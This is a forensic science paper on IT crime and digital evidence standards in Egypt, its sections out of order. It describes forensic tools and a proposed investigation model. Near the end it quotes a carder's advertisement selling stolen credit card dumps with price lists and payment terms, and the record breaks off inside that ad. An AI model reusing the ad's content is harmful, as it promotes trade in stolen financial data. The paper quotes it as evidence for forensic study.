Case notes and records of observations must be of a permanent nature. Handwritten notes and observations must be in ink, not pencil, although pencil (including color) may be appropriate for diagrams or making tracings. Any corrections to notes must be made by an initialed, single strikeout; nothing in the handwritten information should be obliterated or erased. Notes and records should be authenticated by handwritten signatures, initials, digital signatures, or other marking systems.
Standards and Criteria 1.7
Any action that has the potential to alter, damage, or destroy any aspect of original evidence must be performed by qualified persons in a forensically sound manner.
Discussion.As outlined in the preceding standards and criteria, evidence has value only if it can be shown to be accurate, reliable, and controlled. A quality forensic program consists of properly trained personnel and appropriate equipment, software, and procedures to collectively ensure these attributes.
2.4 Investigative Tools :
2.5.1 Overview:
In the early days of computer crime investigation, it was common for digital investigators to use the evidentiary computer itself to obtain evidence. One risk of this approach was that operating the evidentiary computer could alter the evidence in a way that is undetectable. Although programs such as dd on UNIX existed in the 1980s and could be used to capture deleted data stored on a hard drive, these tools were not widely used and most digital evidence examinations at that time were performed at the file system level, neglecting deleted data.
It was not until the early 1990s, that tools like SafeBack and DIBS were developed to enable digital investigators to collect all data on a computer disk, without altering important details. At around the same time, tools such as those still available from Maresware and NTI were developed by individuals from the US Internal Revenue Service (IRS) to help digital investigators process data on a computer disk. The Royal Canadian Mounted Police (RCMP) also developed specialized tools for examining computers. As more people became aware of the evidentiary value of computers, the need for more advanced tools grew. To address this need, integrated tools like Encase and FTK were developed to make the digital investigator's job easier. These tools enable more efficient examination, by automating routine tasks and display data in a graphical user interface to help the user locate important details. Recently, there has been renewed interest in Linux as a digital evidence examination platform and tools such as The Sleuthkit and SMART have been developed to provide a user-friendly interface. More sophisticated tools utilizing powerful microscopes are available to recover overwritten data from hard drives, but these are prohibitively expensive for most purposes.
Unfortunately, many individuals are still unaware of the need for these tools. Although courts have been lenient on investigators who mishandle digital evidence, this is changing as awareness of the associated issues grows. Gates Rubber Co. v. Bando Chemical Indus. Ltd. provides an example of one court that criticized an investigator for improper digital evidence handling. Instead of using specialized digital evidence processing tools, the investigator copied individual files from the computer and was criticized by the court for not using "the method which would yield the most complete and accurate results."
There has been a similar progression in the evolution of tools for collecting evidence on communication systems. In the late 1980s, Clifford Stoll described how he made paper printouts of network traffic in an effort to preserve it as evidence. Network monitoring tools like tcpdump and Ethereal can be used to capture network traffic but they are not specifically designed for collecting digital evidence. Commercial tools such as Carnivore, NetIntercept, NFR Security, NetWitness, and SilentRunner have been developed with integrated search, visualization, and analysis features to help digital investigators extract information from network traffic.
There has been a similar progression in the evolution of tools for collecting evidence on embedded computer systems. It is common for digital investigators to read data from pagers, mobile phones, and personal digital assistants directly from the devices. However, this approach does not provide access to deleted data and may not be possible if the device is password protected or does not have a way to display the data it contains. Therefore, tools such as ZERT, TULP, and Cards4Labs have been developed to access password protected and deleted data. More sophisticated techniques involving electron microscopes are available to recover encrypted data from embedded systems but these are prohibitively expensive for most purposes.
Over the years, bugs have been found in various digital evidence processing tools, potentially causing evidence to be missed or misinterpreted. To avoid the resulting miscarriages of justice that may result from such errors, it is desirable to assess the reliability of commonly used tools. The National Institute of Standards and Testing are making an effort to test some digital evidence processing tools. However, testing even the most basic functionality of tools is a time intensive process making it difficult to keep up with changes in the tools. Also, it is unlikely that a single group can test every tool including those used to collect evidence from networks and embedded systems. Additionally, in some instances, it may not be possible to create standard tests for the advanced features of various tools, because each tool has different features.
Another approach that has been suggested to reduce the complexity of tool testing is to allow people to see the source code for critical components of the software. Providing programmers around the world with source code allows tool testers to gain a better understanding of the program and increases the chances that bugs will be found. It is acknowledged that commercial tool developers will want to keep some portions of their programs private to protect their competitive advantage. However, certain operations, such as copying data from a hard drive, are sufficiently common and critical to require an open standard. Ultimately, given the complexity of computer systems and the tools used to examine them, it is not possible to eliminate or even quantify the errors, uncertainties, and losses and digital investigators must validate their own results using multiple tools (11).
2.5.2 Examples of hardware tools:
2.5.2.1 Forensic system:
Figure 2.1: Forensic system
The F.R.E.D. family of forensic workstations consists of integrated forensic processing platforms capable of handling the most challenging computer case. Available in mobile, stationary and laboratory configurations, these systems are designed for both the acquisition and examination of computer evidence (13)
2.5.2.2 RoadMASSter-3:
Figure 2.2: RoadMASSter-3
The RoadMASSter 3 Forensics data acquisition and analysis tool is designed to perform both as a fast and reliable hard drive imaging and data analysis unit. This computer forensic system is built for the road with all the tools necessary to acquire or analyze data from today’s common interface technologies including FireWire 1394A/B, USB, IDE, SATA, SAS and SCSI. With features such as multiple media support, multiple capture mode support, on the fly hashing capabilities, powerful processor for analysis, the RoadMASSter 3 is a versatile and powerful Forensic tool (14)
2.5.2.3 HardCopy II Drive Imaging System:
Figure 2.3: 3 HardCopy II Drive Imaging System
HardCopy 2. Copies drives at up to 5.5 GB per minute, built in MD5, lightweight, all the power of HardCopy and then some! HardCopy 2 adds the ability to chunk the data during a hard drive image, to ease archiving later (15).
2.5.2.4 ImageMASSter 6007SAS:
Figure 2.4: ImageMASSter 6007SAS
ICS Industrial High-Speed Multiple Hard Drive Duplicators are being used for hard drive cloning, copying data, upgrading computers and sanitizing hard drives on the production line of the major PC Manufacturers as well as thousands of large and middle size corporations. Copy data in different modes, image hard drives of different size and models, erase data, copy hidden partitions, format hard drives, reliable hard drive cloning (14).
2.5.3 Examples of software tools:
2.5.3.1 EnCase® Software:
(http://www.guidancesoftware.com/)
Figure 2.5: EnCase® Software
EnCase is the hands-down leader in stand-alone forensics analysis software. EnCase is loaded with features, and is widely accepted in court. Users can examine files, including deleted files and unallocated data. It produces reports and extracts without altering the original data (16).
2.5.3.2 The Forensic ToolKit:
Figure 2.6: The Forensic ToolKit
Figure 2.7: Screenshot for Forensic Toolkit
Forensic Toolkit is customizable filters allow you to sort through thousands of files to quickly find the evidence you need. Forensic Toolkit is recognized as the leading forensic tool to perform e-mail analysis (13).
2.5.3.3 Decode - Forensic Date/Time Decoder:
Figure 2.8: Screenshot for Decode - Forensic Date/Time Decoder
This utility was designed to decode the various date/time values found embedded within binary and other file types. This release now supports the following date/time formats and will allow you to specify the offset from GMT.
Date and time values are stored within Windows in various formats. For example, Internet History - index.dat, recycle bin INFO files, windows link files and Microsoft Office documents all contain a 64bit date/time structure.
During a forensic examination, you may need to decode a date or verify the date provided to you by forensic software. This is where decode comes in. Decode can take a decimal value or a HEX value and convert it into a date & time in a variety of formats (17).
Part Ш
Standard model for digital evidences investigation in Egypt
Part Ш
Standard model for digital evidences investigation in Egypt
Any scientific work can represent by a triangle, first side is a qualified persons, second is the appropriate tools and third is the methodology.
Standard model should take into account those three points:
3.1 Qualified persons:
There are three different categories deal with digital evidences:
Digital Crime Scene Technicians: Individuals responsible for gathering data at a crime scene should have basic training in evidence handling and documentation as well as in basic crime reconstruction to help them locate all available sources of evidence on a network.
Digital Evidence Examiners: Individuals responsible for processing particular kinds of digital evidence require specialized training and certification in their area.
Digital Investigators: Individuals responsible for the overall investigation should receive a general training but do not need very specialized training or certification. Investigators are also responsible for reconstructing the actions relating to a crime using information from first responders and forensic examiners to create a more complete picture for investigators and attorneys.
Training and certification programs in this field should take into account these different areas of expertise (11).
[Principle 1 :Must be a minimum qualification and certification for persons dealing with digital evidence according to their specialties ]
3.2 Appropriate tools:
As we said before there are a lot of hardware and software tools used in digital evidence investigations.
[ Principle 2 : There must be a list of approved software and hardware tools used in digital evidence investigation , it must be checked and update regularly ]
3.3 Methodology:
There is no ONE methodology for performing a forensic investigation and analysis. There are too many variables for there to be just one way. Some of the 'typical' variables which first come to mind include; operating systems, software applications, cryptographic algorithms and applications, and hardware platforms. Every investigation is unique and can bring unforeseeable challenges, so the methodology should not be viewed as an end-point but rather as a framework or foundation upon which to build.
[ Principle 3 : Document every thing . ]
Documentation is essential at all stages of handling and processing digital evidence. It is very important to document every procedure in investigation (who, when, how, where).
[ Principle 4 : The integrity of the original media must be maintained throughout the entire investigation , the state of evidence must be unaltered. ]
If it is possible make an exact image of the investigated media, there is a lot of software and hardware helped in this process and always use a suitable tools for your case .
[ Principle 5 : Investigation process must be divided into five phases : Identification , Collection , Examination , Analysis and Reporting . ]
· Identification:
Which recognizes an incident from indicators and determines its type, each type of e-crime has its own types of digital evidences.
· Collection:
Collection of digital evidence must be done without altering it; there must be specific rules for collection different kind of evidence.
· Examination:
It is an in-depth systematic search of evidence relating to the suspected crime.
· Analysis:
Determination of the significance, reconstructing fragments of data and drawing conclusions based on evidence found.
· Reporting:
Writing a report is one of the most important stages of the investigative reconstruction process because, unless findings are communicated clearly in writing, others are unlikely to understand or make use of them; there must be standard templates for every kind of investigations.
References
[1] Technical Working Group for Electronic Crime Scene Investigation, 2001, Crime Scene Electronic Crime Scene Investigation: A Guide for First Responders.
http://www.ojp****doj.gov/nij/pubs-sum/187736.htm
[2] Computer crime, Wikipedia, the free encyclopedia.
http://en.wikipedia.org/wiki/Computer_crime (http://en.wikipedia.org/wiki/Computer_crime)
[3] United Nations office at Vienna, 1994, United Nations Manual on the prevention and control of computer-related crime, International review of criminal policy, Nos.43 and 44.
http://www.unodc.org/unodc/crime_cicp_standards_manuals.html
[4] Egypt's Information Portal, Ministry of Communication and Information Technology.
http://www.ipgd.idsc.gov.eg/Indicators/IndicatorsResult_Details.asp?IndicatorID=657 (http://www.ipgd.idsc.gov.eg/Indicators/IndicatorsResult_Details.asp?IndicatorID=657)
[5] Credit card fraud, Wikipedia, the free encyclopedia.
http://en.wikipedia.org/wiki/Credit_card_fraud
[6] Devices Designed Illegally to Read Credit Card Information from Gas Station Pumps , Arizona Department of Weights and Measures .
http://azdwm.gov/Portals/1/PDF/SkimmerPressReleaseJune2007.pdf (http://azdwm.gov/Portals/1/PDF/SkimmerPressReleaseJune2007.pdf)
[7] Phishing , Webopedia , online computer dictionary for computer and internet terms and definitions.
http://www.webopedia.com/TERM/p/phishing.html
[8] Phishtank.
http://www.phishtank.com/images/phish_world_map.gif
[9] Lee H.,Palmbach T. and Miller M. (2001) Henry Lee's Crime Scene Handbook, London: Academic Press.
[10] Digital evidence, Wikipedia, the free encyclopedia.
http://en.wikipedia.org/wiki/Digital_evidence (http://en.wikipedia.org/wiki/Digital_evidence)
[11] Casey Eoghan , 2004 , Digital Evidence and Computer Crime: Forensic Science, Computers, and the Internet, Second Edition ,Academic Press .
[12] Scientific Working Group on Digital Evidence(SWGDE),International Organization on Digital Evidence ( IOCE ) ,2000, Digital Evidence: Standards and Principles , Forensic Science communications Volume 2 Number 2 , U.S Department of Justice
http://www.fbi.gov/hq/lab/fsc/backissu/april2000/swgde.htm (http://www.fbi.gov/hq/lab/fsc/backissu/april2000/swgde.htm)
[13] Digital Intelligence, Software, Hardware, Training & Casework solutions for the computer community.
http://www.digitalintelligence.com/forensichardware.php (http://www.digitalintelligence.com/forensichardware.php)
[14] Intelligent Computer Solutions.
http://www.ics-iq.com/ (http://www.ics-iq.com/)
[15] Forensicpc.com.
http://www.forensicpc.com/proddetail.asp?prod=HARDCOPY2 (http://www.forensicpc.com/proddetail.asp?prod=HARDCOPY2)
[16] Genco.A. Elizabeth, 2002, Do-it-yourselfer experiences the do's and don'ts of building a forensics workstation.
http://searchsecurity.techtarget.com/ (http://searchsecurity.techtarget.com/)
[17] Digital Detective ( Forensic Computing Tools & Utilities ).
http://www.digital-detective.co.uk/freetools/decode.asp (http://www.digital-detective.co.uk/freetools/decode.asp)
Arabic Summary
ملخص
مع التزايد المطرد في استخدام الكمبيوتر والانترنت ووسائل الاتصال الحديثة , هناك تزايد مناظر في استخدام تلك الوسائل اما كأدوات مساعدة في الجرائم التقليدية او في نوعيات جديدة من الجرائم , وجميع تلك الجرائم يمكن ان يطلق عليها جرائم تكنولوجيا المعلومات او الجرائم الالكترونية .
وجرائم تكنولوجيا المعلومات يمكن النظر اليها من اكثر من وجهة نظر , فيمكن بحثها من وجهة النظر القانونية او من وجهة نظر علم الاجتماع او من وجهة نظر علوم الحاسب الالي .
الا اننا في تلك الدراسة تناولناها من وجهة نظر العلوم الشرعية – العدلية – حيث تناولنا في البداية تعريف تلك الجرائم والانواع الشائعة منها وقمنا بسرد عدد من الحالات الواقعية لتلك الجرائم في مصر ثم تناولنا صلب الموضوع – من وجهة نظر العلوم الشرعية – الا وهو الادلة واساليب تحقيقها فقمنا بتعريف الادلة الرقمية وانواعها والحاجة الملحة لوجود اسس ضابطة لهذا العلم والجهد العالمي المبذول لايجاد تلك الاسس وتطور عملية البحث عن الادلة وامثلة من الادوات المستخدمة في تلك العملية , واخيرا قمنا بوضع نموذج قياسي للبحث عن الادلة الرقمية في مصر وذلك عن طريق تطبيق عدد من المفاهيم الاساسية .
By:
Ahmed Mohamed Walid
Department of counterfeiting and forgery Researches
Medico-Legal Administration, Ministry of Justice
AhmedMWalid@hotmail.com
Table of Contents
Table of Contents .................................................. .................................................. ................3
List of Figures .................................................. .................................................. ......................5
Abstract .................................................. .................................................. ................................6
Introduction .................................................. .................................................. .........................7
Part І: IT-Crime .................................................. .................................................. ..................8
1.1 Definitions .................................................. .................................................. ..........9
1.2 Common types of computer crime .................................................. .......................9
1.2.1 Fraud by computer manipulation .................................................. ..........9
1.2.2 Computer forgery .................................................. .................................11
1.2.3 Damage to or modifications of computer data or programs ...................11
1.2.4 Unauthorized access to computer systems and service ..........................12
1.2.5 Unauthorized reproduction of legally protected computer programs ....15
1.3 E-Crime in Egypt ………………………………………………………….….....15
1.3.1 First Case (forgery) .................................................. ..............................16
1.3.2 Second case (currency counterfeiting) .................................................. .17
1.3.3 Third case (Credit card fraud ' Skimming') ………...…………….……20
1.3.4 Fourth case (Phishing) …………………………………………………26
Part П: Digital Evidence and Computer Crime ………………………………………….30
2.1 Definitions ……………………………………………………………………….31
2.2 Types of digital evidence ……………………………………………………......31
2.3 The Need for Standardization …………………………………………...………33
2.4 Standards ……………………………………………………………..……….…35
2.5 Investigative Tools …………………………………………………………..…..38
2.5.1 Overview …………………………………………………………...….38
2.5.2 Examples of hardware tools ………………………………………...…41
2.5.2.1 Forensic system …………………………………………...…41
2.5.2.2 RoadMASSter-3 ……………………………………………..41
2.5.2.3 HardCopy II Drive Imaging System ………………………...42
2.5.2.4 ImageMASSter 6007SAS ..…………………………...…….43
2.5.3 Examples of software tools ……………………………………………44
2.5.3.1 EnCase® Software …………………………………………..44
2.5.3.2 The Forensic ToolKit …....………………………………. …44
2.5.3.3 Decode - Forensic Date/Time Decoder …………………...…45
Part Ш: Standard model for digital evidences investigation in Egypt ………………….47
3.1 Qualified persons ………………..……………………………………………….48
3.2 Appropriate tools ……………….…………………………………………….….49
3.3 Methodology …….……………………………………………………………....49
References ……………………………………………………………………………..……51
Arabic Summary ……………………….………………………………………………..…53
List of Figures
Figure 1.1: Number of Internet subscribers …………………………………………………………………………..…15
Figure 1.2: The forged document ………………………………………………………...….16
Figure 1.3: Different types of currencies …………………………………………………….17
Figure 1.4: Different types of Egyptian currencies prepared for counterfeiting …………….18
Figure 1.5: Egyptian currencies ……………………………………………………………..18
Figure 1.6: U.S.A currency ………………………………………………………………….19
Figure 1.7: Libyan currency …………………………………………………………..……19
Figure 1.8: Credit card writer & cards ………………………………………………………20
Figure 1.9: Skimmer ………………………………………………………………………...21
Figure 1.10: Screenshot for an offer mail of credit cards details …………………………...21
Figure 1.11: an offer mail of credit cards details …………………………………….....22-25
Figure 1.12: Sample of credit card details …………………………………………………..25
Figure 1.13: Phishing sites by country of host …………………………………………...…26
Figure 1.14: Screenshot for a phishing site part 1 …………………………………………..27
Figure 1.15: Screenshot for a phishing site part 2 …………………………………………..27
Figure 1.16: a script used in phishing processes …………..……………………………28-29
Figure 2.1: Forensic system ………………………………………………………………...41
Figure 2.2: RoadMASSter-3 ……………………………………………………………….41
Figure 2.3: 3 HardCopy II Drive Imaging System ………………………………………...42
Figure 2.4: ImageMASSter 6007SAS ……………………………………………………...43
Figure 2.5: EnCase® Software ……………………………………………………………..44
Figure 2.6: The Forensic ToolKit …………………………………………………………..44
Figure 2.7: Screenshot for Forensic Toolkit ……………………………………………......45
Figure 2.8: Screenshot for Decode - Forensic Date/Time Decoder ...………………………45
Abstract
With the evolution of using computers and internet, there is rapid increase in using these new technologies in crime, sometimes it's used as tool for traditional crime or to invent new type of crime, on both cases, it defines as IT-Crime (Information Technology Crime), IT-Crime can be viewed from different angles like law, social studies and computer sciences.
This paper discuss IT-crimes from forensic science perspective, by defining the IT-crimes and its common types then give examples of actual cases of IT-crime in Egypt , then we get into the core of this crime from forensic science point of view that evidences and investigation.
The paper explains the definition of digital evidence, its types, the need for standardization, the global effort in this filed, the evolution of investigation processes and examples of investigation tools.
Finally it gives a framework to establish a standard model for digital evidence investigation process in Egypt.
Introduction
The Internet, computer networks, and automated data systems present an enormous new opportunity for committing criminal activity. Computers and other electronic devices are being used increasingly to commit, enable, or support crimes perpetrated against persons, organizations, or property. Whether the crime involves attacks against computer systems, the information they contain, or more traditional crimes such as murder, money laundering, or fraud, electronic evidence increasingly is involved. It is no surprise that law enforcement and criminal justice officials are being overwhelmed by the volume of investigations and prosecutions that involve electronic evidence (1).
IT-Crime is a new field combining more than one area: Law, Computer Science, and Sociology. Jurist could examine that phenomenon from the perspective of the efficiency of the existing legislations to deal with it, Computer Specialist could examine that phenomenon from the perspective of the computer programs used in and its codes, Sociologist examines that phenomenon from the perspective of its effect in Community.
In this paper we study this phenomenon from forensic computer science point of view; we divided it into three parts, part І begins with definition of IT-Crime, its common types according to United Nations Manual on the prevention and control of computer-related crime, IT-Crime in Egypt and real cases of it. Part П talked about Digital Evidence and Computer Crime ,its Types , The Need for Standardization, Standards according to Scientific Working Group on Digital Evidence (SWGDE ) & International Organization on Digital Evidence (IOCE) , Investigative Tools and its development , Examples of hardware and software investigation tools .part Ш Our recommendations to establish a standard model for digital evidence investigation in Egypt .
Part І
IT-Crime
Part І
IT-Crime
1.1 Definitions:
There is no standard definition of e-crime. People use different terms with different meanings – cyber crime, hi-tech crime, computer crime, Internet crime, IT crime.
It is simply any criminal activity where a computer or network is the tool, target, or place of a crime. These categories are not exclusive and many activities can be characterized as falling in one or more category. Additionally, although the terms computer crime or cyber crime are more properly restricted to describing criminal activity in which the computer or network is a necessary part of the crime, these terms are also sometimes used to include traditional crimes, such as fraud, theft, blackmail, forgery, and embezzlement, in which computers or networks are used to facilitate the illicit activity (2).
1.2 Common types of computer crime:
( According to United Nations Manual on the prevention and control of computer-related crime(3) )
All stages of computer operations are susceptible to criminal activity, either as the target of the crime or the instrument of the crime or both. Input operations, data processing, output operations and communications have all been utilized for illicit purposes. The more common types of computer-related crime are categorized next:
1.2.1 Fraud by computer manipulation:
Intangible assets represented in data format, such as money on deposit or hours of work, are the most common targets of computer-related fraud. Modern business is quickly replacing cash with deposits transacted on computer systems, creating an enormous potential for computer abuse. Credit card information, as well as personal and financial information on credit-card clients, has been frequently targeted by the organized criminal community. The sale of this information to counterfeiters of credit cards and travel documents has proven to be extremely lucrative. Assets represented in data format often have a considerably higher value than traditionally targeted economic assets, resulting in potentially greater economic loss. In addition, improved remote access to databases allows the criminal the opportunity to commit various types of fraud without ever physically entering the premises of the victim
Computer fraud by input manipulation is the most common computer crime, as it is easily perpetrated and difficult to detect. Often referred to as "data diddling", it does not require any sophisticated computer knowledge and can be committed by anyone having access to normal data-processing functions at the input stage.
Program manipulation, which is very difficult to discover and is frequently not recognized, requires the perpetrator to have computer-specific knowledge. It involves changing existing programs in the computer system or inserting new programs or routines. A common method used by persons with specialized knowledge of computer programming is the Trojan horse, whereby computer instructions are covertly placed in a computer program so that it will perform an unauthorized function concurrent with its normal function. A Trojan horse can be programmed to self-destruct, leaving no evidence of its existence except the damage that it caused. Remote access capabilities today also allow the criminal to easily run modified routines concurrently with legitimate programs.
Output manipulation is effected by targeting the output of the computer system. The obvious example is cash dispenser fraud, achieved by falsifying instructions to the computer in the input stage. Traditionally, such fraud involved the use of stolen bank cards. However, specialized computer hardware and software is now being widely used to encode falsified electronic information on the magnetic strips of bank cards and credit cards.
1.2.2 Computer forgery:
Where data are altered in respect of documents stored in computerized form, the crime is forgery. In this and the above examples, computer systems are the target of criminal activity. Computers, however, can also be used as instruments with which to commit forgery. The created a new library of tools with which to forge the documents used in commerce. A new generation of fraudulent alteration or counterfeiting emerged when computerized color laser copiers became available. These copiers are capable of high-resolution copying, the modification of documents and even the creation of false documents without benefit of an original, and they produce documents whose quality is indistinguishable from that of authentic documents except by an expert.
1.2.3 Damage to or modifications of computer data or programs :
This category of criminal activity involves either direct or covert unauthorized access to a computer system by the introduction of new programs known as viruses, "worms" or logic bombs. The unauthorized modification, suppression or erasure of computer data or functions with the internet to hinder normal functioning of the system is clearly criminal activity and is commonly referred to as computer sabotage. Computer sabotage can be the vehicle for gaining economic advantage over a competitor, for promoting the illegal activities of ideologically motivated terrorists or for stealing data or programs (also referred to as "bitnapping") for extortion purposes. In one reported incident at London, Ontario, in 1987, a former employee of a company sought unsuccessfully to sabotage the computer system of the company by inserting a program into the system that would have wiped it out completely.
A virus is a series of program codes that has the ability to attach itself to legitimate programs and propagate itself to other computer programs. A virus can be introduced to a system by a legitimate piece of software that has been infected, as well as by the Trojan horse method discussed above.
The potential purposes of viruses are many, ranging from the display of harmless messages on several computer terminals to the irreversible destruction of all data on a computer system. In 1990, Europe first experienced a computer virus, used to commit extortion in the medical research community. The virus threatened to destroy increasing amounts of data if no ransom was paid for the "cure". A significant amount of valuable medical research data was lost as a result.
A worm is similarly constructed to infiltrate legitimate data-processing programs and to alter or destroy the data, but it differs from a virus in that it does not have the ability to replicate itself. In a medical analogy, the worm can be compared to a benign tumor, the virus to a malignant one. However, the consequences of a worm attack can be just as serious as those of a virus attack: for example, a bank computer can be instructed, by a worm program that subsequently destroys itself, to continually transfer money to an illicit account.
A logic bomb, also known as a "time bomb", is another technique by which computer sabotage can be perpetrated. The creation of logic bombs requires some specialized knowledge, as it involves programming the destruction or modification of data at a specific time in the future. Unlike viruses or worms, however, logic bombs are very difficult to detect before they blow up; thus, of all these computer crime schemes, they have the greatest potential for damage. Detonation can be timed to cause maximum damage and to take place long after the departure of the perpetrator. The logic bomb may also be used as a tool of extortion, with a ransom being demanded in exchange for disclosure of the location of the bomb.
Irrespective of motive, the fact remains that the use of viruses, worms and logic bombs constitutes unauthorized modification of legitimate computer data or programs and thus fall under the rubric computer sabotage, although the motive of the sabotage may be circumstantial to the alteration of the data.
1.2.4 Unauthorized access to computer systems and service :
The desire to gain unauthorized access to computer systems can be prompted by several motives, from simple curiosity, as exemplified by many hackers, to computer sabotage or espionage. Intentional and unjustified access by a person not authorized by the owners or operators of a system may often constitute criminal behavior. Unauthorized access creates the opportunity to cause additional unintended damage to data, system crashes or impediments to legitimate system users by negligence.
Access is often accomplished from a remote location along a telecommunication network, by one of several means. The perpetrator may be able to take advantage of lax security measures to gain access or may find loopholes in existing security measures or system procedures. Frequently, hackers impersonate legitimate system users; this is especially common in systems where users can employ common passwords or maintenance passwords found in the system itself.
Password protection is often mischaracterized as a protective device against unauthorized access. However, the modern hacker can easily circumvent this protection using one of three common methods. If a hacker is able to discover a password allowing access, then a Trojan horse program can be placed to capture the other passwords of legitimate users. This type of program can operate concurrently with the normal security function and is difficult to detect. The hacker can later retrieve the program containing the stolen passwords by remote access.
Password protection can also be bypassed successfully by utilizing password cracking routines. Most modern software effects password security by a process that converts a user's selected password into a mathematical series, a process known as encryption. Encryption disguises the actual password, which is then almost impossible to decrypt. Furthermore, legitimate security software has been developed that allows access to data only after it checks encrypted passwords against a dictionary of common passwords so as to alert system administrators of potential weakness in security. However, this same security process can be imitated for illegitimate purposes. Known as a "cracker" program when used for illegitimate purposes, these tools encrypt some or all of the data of the system. This creates a dictionary of data to compare with cracker software, for the purpose of identifying common passwords and gaining access to the system. A variety of these system-specific encryption routines can be obtained from hacker bulletin boards around the world and are regularly updated by the criminal community as security technology develops.
The third method commonly used to access a system is the "trapdoor" method, whereby unauthorized access is achieved through access points, or trapdoors, created for legitimate purposes, such as maintenance of the system.
The international criminal hacker community uses electronic bulletin boards to communicate system infiltration incidents and methods. In one case, details of a Canadian attempt to access a system were found on suspects in an unrelated matter in England; they had removed the material from a bulletin board in Germany. This sharing of information can facilitate multiple unauthorized infiltrations of a system from around the globe, resulting in staggering telecommunication charges to the victim.
With the development of modern telecommunications system, a new field for unauthorized infiltration was created. Personal telecommunications have been expanded with the advent of portable, cellular telecommunication devices. The criminal community has responded to these advances by duplicating the microchip technology.
Modern telecommunications systems are equally vulnerable to criminal activity. Office automation systems such as voice mail boxes and private business exchanges are, in effect, computer systems, designed for the convenience of users. However, convenience features such as remote access and maintenance capabilities, call-forwarding and voice-messaging are easily infiltrated by computer criminals.
Modern telecommunications systems, like other computer systems, are also susceptible to abuse by remote access. The integration of telecommunications systems means that once one system is accessed, a computer operator with sufficient skill could infiltrate the entire telecommunications network of a city. The usual motive for telecommunications crime is to obtain free telecommunications services. However, more innovative telecommunications fraud has also been uncovered, and telecommunications systems have been used to disguise other forms of criminal activity.
1.2.5 Unauthorized reproduction of legally protected computer programs :
The unauthorized reproduction of computer programs can mean a substantial economic loss to the legitimate owners. Several jurisdictions have dictated that this type of activity should be the subject of criminal sanction. The problem has reached transnational dimensions with the trafficking of these unauthorized reproductions over modern telecommunication networks.
1.3 E-Crime in Egypt :
The question is where are we from this phenomenon?
As the increase of computer and internet users in the last few years, the e-crime also increases.
Figure 1.1: Number of Internet subscribers (4)
The numbers of internet subscribers is 5,200,000 at 30/06/2006
The using of computer in criminal activity is beginning first as an aid tools in traditional crimes like document forgery and currency counterfeiting, and then the other types of e-crimes come later.
In this paper we will gave four real cases of e-crimes in Egypt:
1.3.1 First Case (forgery):
It is an example of the using of computer as an aid tool in a traditional crime, in this case the forger use the scanner to get the signature and the fingerprint of the victim from genuine document and then print them by colored printer in another document.
Figure 1.2: The forged document
1.3.2 Second case (currency counterfeiting):
It is another case of the using of computer in traditional crime; Currency counterfeiting is the most fundamental financial crime (http://www.interpol.int/Public/FinancialCrime/Default.asp) – the production of counterfeit currency – recognizes no national boundaries. In Egypt we see Egyptian pounds, dollars, euro, Arabic currencies and others.
In the last few years currency counterfeiting is increase due to the increase of computer users and the low price and more quality of scanners and color printers.
Figure 1.3: Different types of currencies
Figure 1.4: Different types of Egyptian currencies prepared for counterfeiting
Figure 1.5: Egyptian currencies
Figure 1.6: U.S.A currency
Figure 1.7: Libyan currency
1.3.3 Third case (Credit card fraud ' Skimming'):
Skimming is the theft of credit card information by a dishonest employee of a legitimate merchant, manually copying down numbers, or using a magnetic stripe reader on a pocket-sized electronic device. Common scenarios for skimming are restaurants or bars where the skimmer has possession of the victim's credit card out of their immediate view. The skimmer will typically use a small keypad to unobtrusively transcribe the 3 or 4 digits Card Security Code which is not present on the magnetic strip. Many instances of skimming have been reported where the perpetrator has put a device over the card slot of a public cash machine (Automated teller machine), which reads the magnetic strip as the user unknowingly passes their card through it. These devices are often used in conjunction with a pinhole camera to read the user's PIN at the same time.
The cost of credit card fraud reaches into billions of dollars annually. In 2006, fraud in the United Kingdom alone was estimated at £428.0 million (about $700-800 million) (5).
Figure 1.8: Credit card writer & cards
Figure 1.9:( Skimmer is a tiny device that reads your credit card number and delivers it to bad guys (6))
Figure 1.10: Screenshot for an offer mail of credit cards details
>Subject: Skimmed d umps from Hotel DB. News and prices>Date: Mon, 8 Jan 2007 07:55:13 -0800 (PST)> >Hello, i am luxmarket and i am selling dumps since>times of carderplanet. Without excess modesty i want>to say that i am one of the biggest dumps vendor for>the moment.> >On 10/12/2006 brand new, virgin EU DB were released. A>lot of high quality, RARE, high limit EU dumps.> > > Here is my offer for dumps:> >US Dumps> US Mix>(20Gold/20Plats/20Biz&Corp/40MCstandart&calssic), bin>on my choose - $10/one in the count you taking 100+>(e.g. 100 dumps - $1000)> US Classic - $15, Debit Classic - $15> >US MC Standart – $18> > US Gold - $18> US Platinum - $30> US Purchasing/Signature - $40> US Bussines/Corporate - $40> US MC World - $50> >EU dumps> EU Italy Classic - $200> EU Italy Gold - $230> EU Italy Platinum - $300> EU Italy Bussines - $310> EU Spain/Switzerland/Turkey/Greece etc Classic - $120> EU Spain/Switzerland/Turkey/Greece etc Gold - $180> EU Spain/Switzerland/Turkey/Greece etc Platinum ->$180> EU Spain/Switzerland/Turkey/Greece etc Bussines ->$300> EU Germany/UK Classic - $180> EU Germany/UK Gold - $200> > EU Germany/UK Platinum - $180> EU Germany/UK Bussines - $180> EU Other MC standart - $185> EU Other Gold - $180> EU Other Platinum - $185> EU Other Bussines/Corporate - $185> EU Infinite - $1200> EU Amex Black - $1200> EU Dinners - $120> >Arab-countries dumps> Arab Visa Classic - $300> Arab Visa Gold - $300> Arab Visa Platinum - $420> Arab Business/Corporate - $420> Arab Infinite - $1600> Arab Amex - $120> Arab Dinners - $100> >Chipped (201) dumps
>Why the price for EU is too high?>-The price is high because the quality of the goods>are high. High quality costs big money. Let me show>you an example: someone driving BMW nd somebody can>drive Fiat or Seat or something cheap, when you>driving in bmw you feel comfort and freely, but for>this comfort you have to pay money, otherwise - you>drive seat and there is no such comfort and safety ->but less price, you can buy used car at all and crash>it in incedent ;-) . The same story with the dumps,>you can buy cheap dumps from cheap vendor, or from the>ripper at all and you risking to be ripped, or even>worse you can get dumps from old base which is under>control or in warn list and got caught. Choice is>after you... But here is my last word: for the moment>i writing those words the validity of the dumps is on>top (about 90%) and even classics working about 2k>EUR, you really paying for serious stuff you not seen>before. Once again: choice after you...> >What is the minimal sum of the deal with you?>-There is no minimal order - minimal order is one>dump.> >What is the minimal sum of the deal with you if I pay>via E-gold?>-There is no minimal order - minimal order is one>dump.> >What is the format of your dumps?>-My dumps are in the 1-st and 2-nd track format.> >Do you sell the dumps with the original first track?>-Yes.> >How fast can I receive the dumps after the supplying>the info about Western union payment?>-Usally same time as i receiving money. For WU - you>getting the order once my drop picks the funds up.>Sometimes delivery time can be raised up to 24h (very>rare case)> >Do you allow the 